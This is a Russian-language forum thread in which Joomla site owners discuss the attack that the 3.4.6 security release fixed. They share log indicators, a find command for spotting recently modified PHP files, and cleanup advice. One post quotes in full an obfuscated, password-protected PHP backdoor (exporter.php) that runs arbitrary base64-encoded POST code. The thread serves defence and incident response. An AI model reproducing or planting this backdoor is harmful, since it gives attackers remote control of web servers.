Новый релиз безопасности Joomla! 3.4.6 - страница 3 - Joomla 3.x: Установка, обновление и настройка

Вам не просто файлы почистить теперь надо, вам надо просканировать весь сайт на предмет стороннего кода.

Важно! Если кто видит у себя в логах

Код

JDatabaseDriverMysqli

или

Код

O:

это означает что вас уже взломали!
Искать требуется Вам теперь сторонний код на сайте, полностью сканировать и чистить, если хостинг и несколько сайтов то на всех соседних которые не разграничены по правам и пользователям.

Если бы знать как он выглядит ... этот "сторонний код" :-(

Если после - то пытались взломать

ok. спасибо, так и думал, особо не напрягаясь. Озадачила цитата без вариантов, которую привел.

Это означает, что кто-то подменил строку User Agent. Сей факт подтверждает лишь факт атаки, но не взлома.

На уязвимом движке 99.99999*% это атака закончилась заливом шела. Если не настраивался сервер или еще какие работы не велись в плане безопасности, а это не ведется у более 90% пользователей.

а нет-ли плагина который уведомлял бы администратора по емайлу, о выходе новой версии установленных расширений и необходимости обновлении движка Joomla?

уведомлял бы администратора по емайлу

http://extensions.joomla.org/extension/cupdater

Типа такого?

Признаком заражения может служить наличие в логах "JDatabaseDriverMysqli" и "O:" в User-agent запросов.

А если есть в логах JDatabaseDriverMysqli, что делать? Достаточно поставить заплатку или нет?[

А если есть в логах JDatabaseDriverMysqli, что делать? Достаточно поставить заплатку или нет?[

По возможности проверить созданные и измененные файлы. Можно еще айболитом просканировать.

 Что конкретно искать то?

Что айболит покажет проверить на наличие вредоносного кода. Ну и измененные файлы проверить. У кого есть ssh можно воспользоватся

Для проверки только php файлов.

Всех


mtime -1 - дата минус 1 день
-name '*.php' - маска файла

Код

find /путь к сайту -name '*.php' -type f -mtime -1 -exec ls -al  {} \;

Это не всегда помогает, сейчас вредоносы достаточно умные, чтобы либо патчить имеющийся php файл с сохранением даты (filemtime/touch), либо создавать файл в уже существующей (под-под-...)директории, а дату создания файла устанавливать равной дате создания этой директории.

А в логах апача как то ещё, кроме ...JDatabaseDriverMysqli... отслеживается?
Или если есть в логе ...JDatabaseDriverMysqli... , а заплатка не стояла, то стопудово поломали?

А в логах апача как то ещё, кроме ...JDatabaseDriverMysqli... отслеживается?
Или если есть в логе ...JDatabaseDriverMysqli... , а заплатка не стояла, то стопудово поломали?

Если нет ни каких доп. защит то да
В логах должны быть видны действия после вызова JDatabaseDriverMysqli ну и от них отталкиваясь видно до момента когда уже начнут шел использовать, потом только вызовы сторонних или движка сайта PHP файлов.

По логам искать вредоносный код не получиться, по ним только смотреть для анализа можно.

Ну и фиг с ними, откатил сайт на позавчера.
А базу тоже откатывать? До фига там у меня...

Ну и фиг с ними, откатил сайт на позавчера.
А базу тоже откатывать? До фига там у меня...

У вас что бэкапы разные файлов и бд?
Базу проверить можно на предмет пользователей лишних и расширений не вами установленных, могли успеть залить и завести.

Да, у меня раздельные бэкапы.
В базе нового пользователя нет, приложений вроде бы тоже не отмечено, да и похерятся они (приложения) при откате сайта.

Да, у меня раздельные бэкапы.
В базе нового пользователя нет, приложений вроде бы тоже не отмечено, да и похерятся они (приложения) при откате сайта.

Файлы да похерятся, а в бд запись останется если что то было установлено.

 а как быть  с 1.6   и 1.7?  (файлы для Joomla 1.5 и 2.5 не подходят)

а как быть  с 1.6   и 1.7?  (файлы для Joomla 1.5 и 2.5 не подходят)

В них всё равно число дырок слишком большое.
Давно надо было обновить минимум до 2,5

Я не шибко разбираюсь в веб-программировании, потому вопрос: что делает этот запрос, который ...JDatabaseDriverMysqli...?

Позволяет выполнить любой код.
Совершенно любой.

А в Joomla 2.5 нет такого classa JDatabaseDriverMysqli
да?
там JDatabaseMySQLi
Или Я что-то не так понимаю?

смотрите логи. если ваш сайт "щупали" то в логах есть

Ух обновился вовремя, так как потом логи разрывались )))) от попыток!

Вчера ночью пропатчил все сайты, сегодня смотрел логи. Нашел несколько строк с JDatabaseDriverMysqli. Время в логах когда файл еще не был пропатчен. В файлах J2,5 Айболит ничего  подозрительного не нашел, а в файлах J3 найден файлик site/libraries/joomla/exporter.php. У кого то есть подобное.

site/libraries/joomla/exporter.php

Нет такого.

Вообщем проверил около 20 сайтов - все сайты, потенциально взломанные и работающие на J 3 имеют данный файл exporter.php. В файле всего 1 строка - <?php if (md5($_POST["password"]) == "4286e57cd610ccd917c0122b9ccf84c0") { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST["code"] . "'\051\051\073", ""); } ?>

Если Вы в логах сервера обнаружили запрос "JDatabaseDriverMysqli" ДО того по времени, как было поставлено обновление joomla-3.4.6, Это гарантированный взлом сайта.
На вашем сервере гарантированно был выполнен скрипт присланный в переменной $_POST!

Где можно почитать механику процесса? Почему взлом был произведён гарантированно, можете объяснить?

Где можно почитать механику процесса? Почему взлом был произведён гарантированно, можете объяснить?

Вы взламывать собираетесь? 
Механика уже давно одна и та же, ни чего нового.

-находится уязвимость
-боту или руками делается её выполнение
-заливается на прямую или со стороннего сервера файл для соединения
-через него заливаются шелы в разные папки по иерархи
-делается массово и взлом могут производить за раз не одна сеть ботнетов
-потом узнают про залитые файлы и их названия другие
-и они по ним пройдутся, как это было после первых турецких взломов с подменой index.php в 2009-2010г.г. которые несли массовые первые взломы движка 1.5.* в котором не было уязвимости

Обычно через 2-3 месяца названия файлов и где какой код встроен той или иной сеткой ботнетов узнают другие и начинают использовать эти возможности в своих интересах, в соседней теме описан код залитый которым залили шел и закрыли уязвимость сессий, заботливые хакеры, позаботились что бы ни кто другой не получил доступ к серверу.

Ну а использование взломанных сайтов очевидна
-слив бд
-рассылка спама
-ну и сам сервер в сеть ботнетов для дальнейших взломов, и про это уже ни кто из владельцев знать не будет

то что какие то ссылки появляются или коды бирж вставляют это уже не из сетей ботнетов, это остаточное явление

Почитайте, про механику поверхностно в интернете много написано, остальное поймете если разбираетесь в вопросе.

Вот давайте тут не будем ещё и механику разбирать, а?

Вот давайте тут не будем ещё и механику разбирать, а?

Почему?